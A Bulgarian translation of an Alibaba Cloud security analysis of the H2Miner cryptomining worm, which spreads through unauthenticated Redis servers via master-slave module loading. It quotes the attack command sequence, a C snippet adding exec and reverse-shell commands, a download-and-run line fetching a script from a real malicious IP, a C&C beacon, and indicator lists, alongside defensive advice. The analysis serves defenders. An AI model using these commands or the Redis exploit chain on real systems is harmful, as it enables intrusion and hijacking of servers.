Беше открито ново огнище на червеи H2Miner, което експлоатира Redis RCE

Преди ден един от сървърите на моя проект беше атакуван от подобен червей. В търсене на отговор на въпроса "какво беше това?" Намерих страхотна статия от екипа на Alibaba Cloud Security. Тъй като не намерих тази статия на Хабре, реших да я преведа специално за вас <3

Влизане

Наскоро екипът по сигурността на Alibaba Cloud откри внезапно избухване на H2Miner. Този тип злонамерен червей използва липсата на оторизация или слаби пароли за Redis като шлюзове към вашите системи, след което синхронизира собствения си злонамерен модул с подчинения чрез синхронизация главен-подчинен и накрая изтегля този злонамерен модул на атакуваната машина и изпълнява злонамерен инструкции.

В миналото атаките срещу вашите системи са били извършвани предимно чрез метод, включващ планирани задачи или SSH ключове, които са били записани на вашата машина, след като атакуващият е влязъл в Redis. За щастие този метод не може да се използва често поради проблеми с контрола на разрешенията или поради различни версии на системата. Въпреки това, този метод за зареждане на злонамерен модул може директно да изпълни командите на атакуващия или да получи достъп до обвивката, което е опасно за вашата система.

Поради големия брой Redis сървъри, хоствани в Интернет (близо 1 милион), екипът по сигурността на Alibaba Cloud, като приятелско напомняне, препоръчва на потребителите да не споделят Redis онлайн и редовно да проверяват силата на своите пароли и дали са компрометирани. бърз избор.

H2Miner

H2Miner е ботнет за копаене за Linux-базирани системи, който може да нахлуе във вашата система по различни начини, включително липса на разрешение в уязвимостите на Hadoop yarn, Docker и Redis дистанционно изпълнение на команди (RCE). Ботнет работи, като изтегля злонамерени скриптове и злонамерен софтуер, за да копае вашите данни, да разширява атаката хоризонтално и да поддържа командни и контролни (C&C) комуникации.

Redis RCE

Знанията по тази тема бяха споделени от Павел Топорков на ZeroNights 2018. След версия 4.0 Redis поддържа функция за зареждане на плъгини, която дава на потребителите възможността да зареждат файлове, компилирани с C в Redis, за да изпълняват специфични команди на Redis. Тази функция, макар и полезна, съдържа уязвимост, при която в режим master-slave, файловете могат да се синхронизират с slave чрез режим full resync. Това може да се използва от нападател за прехвърляне на злонамерени файлове. След като прехвърлянето приключи, нападателите зареждат модула в атакувания екземпляр на Redis и изпълняват всяка команда.

Анализ на зловреден софтуер червей

Наскоро екипът за сигурност на Alibaba Cloud откри, че размерът на групата за злонамерени копачи H2Miner внезапно се е увеличил драстично. Според анализа общият процес на възникване на атака е следният:

H2Miner използва RCE Redis за пълноценна атака. Нападателите първо атакуват незащитени Redis сървъри или сървъри със слаби пароли.

След това използват командата config set dbfilename red2.so за да промените името на файла. След това нападателите изпълняват командата slaveof за да зададете адреса на хоста за репликация главен-подчинен.

Когато атакуваният екземпляр на Redis установи връзка главен-подчинен със злонамерения Redis, който е собственост на атакуващия, атакуващият изпраща заразения модул с помощта на командата fullresync за синхронизиране на файловете. След това файлът red2.so ще бъде изтеглен на атакуваната машина. След това нападателите използват модула за зареждане ./red2.so, за да заредят този файл so. Модулът може да изпълнява команди от нападател или да инициира обратна връзка (backdoor), за да получи достъп до атакуваната машина.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

След изпълнение на злонамерена команда като напр / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, нападателят ще нулира името на архивния файл и ще разтовари системния модул, за да почисти следите. Файлът red2.so обаче ще остане на атакуваната машина. Потребителите се съветват да обърнат внимание на наличието на такъв подозрителен файл в папката на тяхното копие на Redis.

В допълнение към убиването на някои злонамерени процеси, за да открадне ресурси, нападателят следва злонамерен скрипт, като изтегля и изпълнява злонамерени двоични файлове към 142.44.191.122/сродство. Това означава, че името на процеса или името на директорията, съдържащо kinsing на хоста, може да означава, че тази машина е била заразена от този вирус.

Според резултатите от обратното инженерство зловредният софтуер изпълнява основно следните функции:

• Качване на файлове и тяхното изпълнение
• Минен
• Поддържане на C&C комуникация и изпълнение на атакуващи команди

Използвайте masscan за външно сканиране, за да разширите влиянието си. В допълнение, IP адресът на C&C сървъра е твърдо кодиран в програмата и атакуваният хост ще комуникира с C&C комуникационния сървър, използвайки HTTP заявки, където информацията за зомби (компрометиран сървър) се идентифицира в HTTP заглавката.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Други методи за атака

Адреси и връзки, използвани от червея

/сродство

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

съвет

Първо, Redis не трябва да бъде достъпен от интернет и трябва да бъде защитен със силна парола. Също така е важно клиентите да проверят дали няма файл red2.so в директорията на Redis и че няма „kinsing“ в името на файла/процеса на хоста.

Източник: www.habr.com